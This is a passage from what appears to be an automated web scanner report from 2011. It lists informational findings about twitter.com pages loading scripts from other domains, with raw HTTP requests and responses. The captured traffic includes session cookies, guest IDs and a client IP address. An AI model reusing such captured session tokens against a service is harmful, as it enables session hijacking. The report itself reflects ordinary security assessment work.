Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a0.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.311. http://twitter.com/millenniumpr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/millenniumpr

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /millenniumpr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296661352-30168-38790
ETag: "f2a0e6c75327c6bde49026a33f441692"
Last-Modified: Wed, 02 Feb 2011 15:42:32 GMT
X-Runtime: 0.01902
Content-Type: text/html; charset=utf-8
Content-Length: 50941
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296661350385545; path=/; expires=Wed, 09-Feb-11 15:42:30 GMT; domain=.twitter.com
Set-Cookie: guest_id=129666135282188420; path=/; expires=Fri, 04 Mar 2011 15:42:32 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHkRCuctAToHaWQiJTI1ZmYyOGJhMWQwMGVm%250AYjE3ZjRhNzAyMGYyYTE0OTIyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--273bebf8e6a59a26f05b04399dca4ed09cc2b74f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.312. http://twitter.com/newtwitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/newtwitter

Issue detail

The response dynamically includes the following script from another domain:

http://assets0.zendesk.com/external/zenbox/overlay.js

Request

Response

18.313. http://twitter.com/omniture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/omniture

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664199-46062-40825
ETag: "6d5a2b262abd92c51d2e68d240525fd9"
Last-Modified: Wed, 02 Feb 2011 16:29:59 GMT
X-Runtime: 0.01497
Content-Type: text/html; charset=utf-8
Content-Length: 50852
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.314. http://twitter.com/omniturecare previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/omniturecare

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664202-14392-6419
ETag: "d24545a0d8d916c2d2e6b52256314eba"
Last-Modified: Wed, 02 Feb 2011 16:30:02 GMT
X-Runtime: 0.01363
Content-Type: text/html; charset=utf-8
Content-Length: 52408
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.315. http://twitter.com/orbitz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/orbitz

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /orbitz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664188-35468-44018
ETag: "b86d5768a8b364fdd3659ca5e678dc9c"
Last-Modified: Wed, 02 Feb 2011 16:29:48 GMT
X-Runtime: 0.01357
Content-Type: text/html; charset=utf-8
Content-Length: 50557
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.316. http://twitter.com/orbitz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/orbitz

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /orbitz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296661352-6519-32456
ETag: "c28bb37b2dd880759a3c3e7bbe9bbf76"
Last-Modified: Wed, 02 Feb 2011 15:42:32 GMT
X-Runtime: 0.01729
Content-Type: text/html; charset=utf-8
Content-Length: 50053
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296661350299032; path=/; expires=Wed, 09-Feb-11 15:42:30 GMT; domain=.twitter.com
Set-Cookie: guest_id=129666135281353758; path=/; expires=Fri, 04 Mar 2011 15:42:32 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHARCuctAToHaWQiJTI5YzUwMzZjM2IyNTkw%250AODE5YWQ5YTc2NTQwNjY3MDgyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6001935ba9443587464c66ae0b4df1de23ed2362; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.317. http://twitter.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664310-58800-58905
ETag: "842af48e86ee2867639656bc4245deb8"
Last-Modified: Wed, 02 Feb 2011 16:31:50 GMT
X-Runtime: 0.04884
Content-Type: text/html; charset=utf-8
Content-Length: 18932
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.318. http://twitter.com/prolawrssfeed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/prolawrssfeed

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /prolawrssfeed HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570771-52990-26380
ETag: "257b2d56a0f8d6ef371c4e2c972c8c3a"
Last-Modified: Tue, 01 Feb 2011 14:32:51 GMT
X-Runtime: 0.01689
Content-Type: text/html; charset=utf-8
Content-Length: 42788
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570768467881; path=/; expires=Tue, 08-Feb-11 14:32:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657077116353647; path=/; expires=Thu, 03 Mar 2011 14:32:51 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTIyYjQwYTg5NDU5NDgxMjdmYTViMTVjYjk1OTc5YzMyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI3eaj4S0B--7a5fc965bf09be34b2e39c47e092a5479cc149c1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.319. http://twitter.com/prolawrssfeed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/prolawrssfeed

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /prolawrssfeed HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
